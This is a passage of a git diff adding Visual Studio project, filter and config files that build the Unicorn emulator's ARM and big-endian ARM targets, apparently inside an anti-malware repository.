<WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>arm.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + 
<SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>arm.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + 
<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>arm.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/arm-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/arm-softmmu.vcxproj.filters new file mode 100644 index 0000000..157e6e6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/arm-softmmu.vcxproj.filters @@ -0,0 +1,137 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{c29e2ed5-3ecd-426d-9245-04de2c8ce754}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{89b122b1-9e4c-41b1-8670-c6d9ee3716f6}</UniqueIdentifier> + </Filter> + <Filter Include="hw\arm"> + 
<UniqueIdentifier>{76f837ed-af45-43bf-9ee7-193dbdec1cd5}</UniqueIdentifier> + </Filter> + <Filter Include="target-arm"> + <UniqueIdentifier>{1f03d4ae-6433-4037-a347-993db1a315e6}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{a9187bf5-cd27-47c7-8add-55b11a1150a9}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{015b3e43-eb63-4add-9f53-f3ac3033472f}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude 
Include="..\..\..\qemu\target-arm\op_addsub.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\arm.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile 
Include="..\..\..\qemu\target-arm\neon_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_arm.c"> + <Filter>target-arm</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/config-target.h new file mode 100644 index 0000000..84577a4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/config-target.h @@ -0,0 +1,5 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_ARM 1 +#define TARGET_NAME "arm" +#define TARGET_ARM 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/armeb-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/armeb-softmmu.vcxproj new file mode 100644 index 0000000..ffac024 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/armeb-softmmu.vcxproj @@ -0,0 +1,235 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + 
<Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\armeb.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c" /> + 
<ClCompile Include="..\..\..\qemu\target-arm\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_arm.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{740F3007-7BF0-4C0C-8FA5-2587C794EF31}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>armebsoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + 
</PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" 
Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>armeb.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + 
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>armeb.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + 
<ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>armeb.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>armeb.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git 
a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/armeb-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/armeb-softmmu.vcxproj.filters new file mode 100644 index 0000000..c85b448 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/armeb-softmmu.vcxproj.filters @@ -0,0 +1,137 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{5c1c56e9-7777-47ee-b021-c79bd6ad8c38}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{9c860878-f381-4c2e-86db-b7ba81b46c10}</UniqueIdentifier> + </Filter> + <Filter Include="hw\arm"> + <UniqueIdentifier>{2f89d71a-2c88-497f-960b-42c3ac537df4}</UniqueIdentifier> + </Filter> + <Filter Include="target-arm"> + <UniqueIdentifier>{31088e8b-a2b5-4e0a-a288-4f9c537c350a}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{56559ccc-d240-4e06-b74b-8bd230f7fe07}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{b6c188d2-6b51-4697-ade2-a3c42f88a39d}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude 
Include="..\..\..\qemu\target-arm\kvm-consts.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\armeb.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c"> + 
